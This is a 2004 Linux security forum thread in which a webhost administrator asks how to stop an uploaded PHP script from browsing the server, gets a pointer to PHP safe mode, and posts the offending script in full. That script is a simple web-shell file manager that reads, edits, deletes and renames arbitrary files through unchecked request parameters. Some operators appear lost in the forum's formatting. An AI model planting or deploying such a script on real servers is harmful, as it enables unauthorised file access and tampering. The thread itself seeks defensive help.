LinuxQuestions.org
View the Most Wanted LQ Wiki articles.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 05-02-2004, 10:37 PM   #1
Zoey_The_Cat
LQ Newbie
 
Registered: May 2004
Distribution: RedHat
Posts: 4

Rep: Reputation: 0
Uploaded Script can view /


I help administrate for a webhost. Recently a PHP script was uploaded and when executed, the person can see / and it's subdir's on the server. I'm pretty sure it's read-only, but I don't like it. How would I go about fixing it, so this isn't possible? I do have the PHP file if anyone needs to view it.

I can supply the server stats if needed.

Thanks!
 
Old 05-03-2004, 04:05 PM   #2
david_ross
Moderator
 
Registered: Mar 2003
Location: Scotland
Distribution: Slackware, RedHat, Debian
Posts: 12,047

Rep: Reputation: 64
Welcome to LQ.

You can use php safe mode:
http://www.php.net/features.safe-mode

It would be worthwhile letting your customers know this is happening as some scripts may need modifying to work in this environment.
 
Old 05-03-2004, 04:19 PM   #3
Zoey_The_Cat
LQ Newbie
 
Registered: May 2004
Distribution: RedHat
Posts: 4

Original Poster
Rep: Reputation: 0
Quote:
Originally posted by david_ross
Welcome to LQ.

You can use php safe mode:
http://www.php.net/features.safe-mode

It would be worthwhile letting your customers know this is happening as some scripts may need modifying to work in this environment.
Excellent, thanks.
 
Old 05-03-2004, 05:02 PM   #4
Zoey_The_Cat
LQ Newbie
 
Registered: May 2004
Distribution: RedHat
Posts: 4

Original Poster
Rep: Reputation: 0
Well, I tried enabling it, and putting some of the commands that are in the offending PHP file into the 'commands-to-disable-unless-you-own-it' part, saved it, restarted Apache, but it appears to have done nothing.

Am I doing something wrong?

Here's the script, if it helps:

PHP Code:

<?PHP
if(isset($_GET['file']) && isset($_GET['dir'])){
$fp = @fopen($_GET['dir'].$_GET['file'], "r");
$content = @fread($fpfilesize($_GET['dir'].$_GET['file']));
$content highlight_string($content1);
echo 
"<html><head><title>Read</title></head><body><a href='".$PHP_SELF."?dir=".$_GET['dir']."'>Go Back<br><a href='".$PHP_SELF."?edit=".$_GET['file']."&dir=".$_GET['dir']."'>Edit | <a href='".$PHP_SELF."?delete=".$_GET['file']."&dir=".$_GET['dir']."'>Delete | <a href='".$PHP_SELF."?rename=".$_GET['file']."&dir=".$_GET['dir']."'>Rename<br><br><p>".$content."</p></body></html>";
}elseif(isset(
$_GET['dir']) && !isset($_GET['file']) && !isset($_GET['edit']) && !isset($_GET['delete']) && !isset($_GET['rename'])){
if(
substr($_GET['dir'], -1) == "/"){
$current $_GET['dir'];
}else{
$current $_GET['dir']."/";
}
$dir = @opendir($current);
echo 
"<html><head><title>Browsing '$current'</title></head><body>";
echo 
"Listing:<br><hr><br>";
while(
$file = @readdir($dir)){
echo 
$file." <a href='".$PHP_SELF."?dir=$current$file'>Open Dir | <a href='".$PHP_SELF."?file=$file&dir=$current'>Open File<br>";
}
@
closedir($dir);
echo 
"<hr></body></html>";
}elseif(isset(
$_GET['edit']) && isset($_GET['dir'])){
if(isset(
$_POST['change'])){
$change html_entity_decode($_POST['change']);
$fp = @fopen($_GET['dir'].$_GET['edit'], "w");
$result = @fwrite($fp$change);
if(!
$result){
echo 
"Error Writing File";
}else{
header("location: ".$PHP_SELF."?file=".$_GET['edit']."&dir=".$_GET['dir']);
}
}else{
$fp = @fopen($_GET['dir'].$_GET['edit'], "r");
$result = @fread($fpfilesize($_GET['dir'].$_GET['edit']));
$result htmlentities($result);
echo 
"<html><head><title>Editing '".$_GET['edit']."'</title></head><body><center><form action='".$PHP_SELF."?edit=".$_GET['edit']."&dir=".$_GET['dir']."' method='POST'><textarea name='change' rows='40' cols='60'>".$result."</textarea><br><input type='submit' name='submit' value='Edit'></form></center></body></html>";
}
}elseif(isset(
$_GET['delete']) && isset($_GET['dir'])){
$result = @unlink($_GET['dir'].$_GET['delete']);
if(!
$result){
echo 
"File could not be deleted";
}else{
header("location: ".$PHP_SELF."?dir=.");
}
}elseif(isset(
$_GET['rename'])){
if(isset(
$_POST['change'])){
$result = @rename($_GET['rename'], $_POST['change']);
if(!
$result){
echo 
"File could not be renamed!";
}else{
header("location: ".$PHP_SELF."?file=".$_POST['change']."&dir=".$_POST['dir']);
}
}else{
echo 
"<html><head><title>Rename</title></head><body><center><form action='".$PHP_SELF."?rename=".$_GET['rename']."&dir=".$_GET['dir']."' method='POST'><input type='dir' name='change' value='".$_GET['dir']."'><input type='text' name='change' value='".$_GET['rename']."'><br><input type='submit' value='Rename'></form></center></body></html>";
}
}else{
echo 
"<html><head><title>Get Directory</title></head><body><center><form action='".$PHP_SELF."' method='GET'><input type='text' name='dir'><br><input type='submit' value='Get Directory'></form></center></body></html>";
}
?>
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Re: Vsftpd uploaded files Permissions silver05 Linux - Software 2 09-30-2005 09:22 AM
Uploaded Files permissions (proftpd) Wynand1 Linux - Security 1 01-28-2005 04:32 AM
Renaming files as they are uploaded Cr4wford Linux - Software 1 04-26-2004 04:41 PM
Script to both view AND save to file radnix Linux - General 3 03-17-2004 08:29 AM
uploaded image distorted wujimon Linux - General 1 03-02-2003 01:25 AM


All times are GMT -5. The time now is 04:00 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration